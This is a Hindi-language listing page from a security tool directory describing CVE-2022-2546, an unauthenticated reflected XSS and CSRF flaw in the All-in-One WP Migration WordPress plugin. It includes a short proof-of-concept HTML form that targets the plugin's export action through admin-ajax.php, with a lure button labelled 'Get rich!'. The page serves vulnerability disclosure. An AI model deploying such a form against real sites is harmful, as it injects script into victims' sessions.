Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-2546 — All-in-One WP Migration < 7.63 - अप्रमाणित Reflected XSS + CSRF | Kitploit
उपकरण/GitHubGitHub/openxp-research/cve-2022-2546
फ़िशिंग उपकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubopenxp-research/cve-2022-2546

CVE-2022-2546

All-in-One WP Migration < 7.63 - अप्रमाणित Reflected XSS + CSRF

रिपॉजिटरी देखें
132 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

All-in-One WP Migration < 7.63 - अप्रमाणित रिफ्लेक्टेड XSS + CSRF

विवरण

प्लगइन गलत कंटेंट प्रकार का उपयोग करता है, और ai1wm_export कार्रवाई से प्रतिक्रिया को ठीक से एस्केप नहीं करता है, जिससे हमलावर एक अनुरोध तैयार कर सकता है जो किसी भी विज़िटर द्वारा सबमिट करने पर प्रतिक्रिया में मनमाना html या javascript इंजेक्ट करेगा जो पीड़ित के सत्र में निष्पादित होगा।

प्रूफ ऑफ कॉन्सेप्ट

हमलावर

दोष को पुन: उत्पन्न करने के लिए, हम प्लगइन द्वारा सभी वेबसाइट सामग्री निर्यात कर सकते हैं और आउटपुट फ़ाइल नाम में एक अमान्य नाम डाल सकते हैं।

ATTACKER VIDEO

भेद्यता को मान्य करके, हमले को CSRF के साथ जोड़ना संभव है, जो पीड़ित के ब्राउज़र को पेलोड के साथ एक अनुरोध भेजने के लिए मजबूर करेगा।

पीड़ित

VICTIM VIDEO

कोड

<form action="https://example.com/wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1" method="POST">
  <!--
    Note: The secret key must be obtained through other means.
    It is stored in the site option `ai1wm_secret_key`, but is
    static for the lifetime of the site.
  -->
  <input type="hidden" name="secret_key" value="[secret_key]">
  <input type="hidden" name="ai1wm_manual_export" value="1">
  <input type="hidden" name="archive" value="">

  <input type="submit" value="Get rich!">
</form>

प्रभावित संस्करण

All-in-One WP Migration < 7.63

संदर्भ

Sucuri

WPScan

Hacking Force

क्रॉस-साइट स्क्रिप्टिंग (XSS)

वर्गीकरण

प्रकार: क्रॉस-साइट स्क्रिप्टिंग

OWASP TOP 10: A03:2021-इंजेक्शन

CWE: CWE-79 वेब पेज जनरेशन के दौरान इनपुट का अनुचित न्यूट्रलाइज़ेशन ('क्रॉस-साइट स्क्रिप्टिंग')

शोधकर्ता/हैकर्स

Geovanni Campos (GeoZIN), Thiago Martins (Kirito), Jorge Buzeti (R3tr0), Leandro Inacio (Saitama), Lucas de Souza (Sinnat), Matheus Oliveira (Froyd), Filipe Baptistella (Baptistella), Leonardo Paiva (Megatron), Jose Thomaz (Pip3r), Joao Maciel (Yohan), Vinicius Pereira (Vini), , Hudson Nowak (Nowak) e Guilherme Acerbi (Ghost).

टूल डाउनलोड करें